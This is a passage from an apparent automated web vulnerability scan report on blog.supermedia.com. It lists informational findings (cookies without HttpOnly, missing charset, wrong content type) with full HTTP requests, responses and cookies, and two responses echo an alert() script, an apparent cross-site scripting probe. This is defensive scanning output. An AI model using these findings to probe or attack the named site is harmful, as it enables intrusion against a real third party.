HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:34 GMT
Server: Unspecified
Content-Length: 51
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:34 GMT;path=/

<script type="text/javascript">alert("");</script>

4.19. http://blog.supermedia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: blog.supermedia.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763697|check#true#1296761897; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:36:43 GMT
Server: Unspecified
Cteonnt-Length: 328
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:51:43 GMT;path=/
Cache-Control: private
Content-Length: 328

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
<p>Add
...[SNIP]...

4.20. http://blog.supermedia.com/feed-icon-28x28.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /feed-icon-28x28.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /feed-icon-28x28.png HTTP/1.1
Host: blog.supermedia.com
Proxy-Connection: keep-alive
Referer: http://blog.supermedia.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; mbox=session#1296759528614-838261#1296763697|check#true#1296761897

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:36:40 GMT
Server: Unspecified
Last-Modified: Fri, 23 Apr 2010 19:43:36 GMT
ETag: "53285-6c9-a4a0ea00"
Accept-Ranges: bytes
Content-Length: 1737
Content-Type: image/png
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:51:40 GMT;path=/

.PNG
.
...IHDR.............r......gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...[IDATx..VY..E.....g..Y....{. ..dY.$....Jbx .>..D.^.....|UL|@b.@!1.....P. ......r....{...tw.....3KHtf..........
...[SNIP]...

4.21. http://blog.supermedia.com/feed/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /feed/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /feed/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:13 GMT
Server: Unspecified
Connection: close
Content-Type: text/xml
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:13 GMT;path=/

<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0"
                   xmlns:content="http://purl.org/rss/1.0/modules/content/"
                   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
                >
<channel>
<titl
...[SNIP]...

4.22. http://blog.supermedia.com/feed/atom/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /feed/atom/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /feed/atom/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:13 GMT
Server: Unspecified
Connection: close
Content-Type: text/xml
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:13 GMT;path=/

<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>SuperMedia Client Newsletter</title>
<link href="http://blog.supermedia.com/" ></link>
<id>urn:uuid:df704e63-b0
...[SNIP]...

4.23. http://blog.supermedia.com/main.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /main.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /main.css HTTP/1.1
Host: blog.supermedia.com
Proxy-Connection: keep-alive
Referer: http://blog.supermedia.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763650|check#true#1296761850; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:36:38 GMT
Server: Unspecified
Last-Modified: Fri, 23 Apr 2010 15:59:59 GMT
ETag: "53286-43f-84e9bdc0"
Accept-Ranges: bytes
ntCoent-Length: 1087
Content-Type: text/css
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:51:38 GMT;path=/
Cache-Control: private
Content-Length: 1087

div#text_blog {
padding:25px;
}
div.blog_text {
padding:10px;
padding-bottom:20px;
margin-bottom:20px;
border-bottom:1px solid #ccc;
}
h2.post_title, h2.post_title a {
color:#006BB6 !i
...[SNIP]...

5. HTML does not specify charset  previous  next
There are 2 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


5.1. http://blog.supermedia.com/comment_form.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /comment_form.php

Request

GET /comment_form.php HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:34 GMT
Server: Unspecified
Content-Length: 37
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:34 GMT;path=/

You+must+enter+a+valid+email+address.

5.2. http://blog.supermedia.com/comment_html.php  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /comment_html.php

Request

GET /comment_html.php HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:34 GMT
Server: Unspecified
Content-Length: 51
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:34 GMT;path=/

<script type="text/javascript">alert("");</script>

6. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blog.supermedia.com
Path:   /comment_form.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /comment_form.php HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:34 GMT
Server: Unspecified
Content-Length: 37
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:34 GMT;path=/

You+must+enter+a+valid+email+address.

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 09:35:45 CST 2011.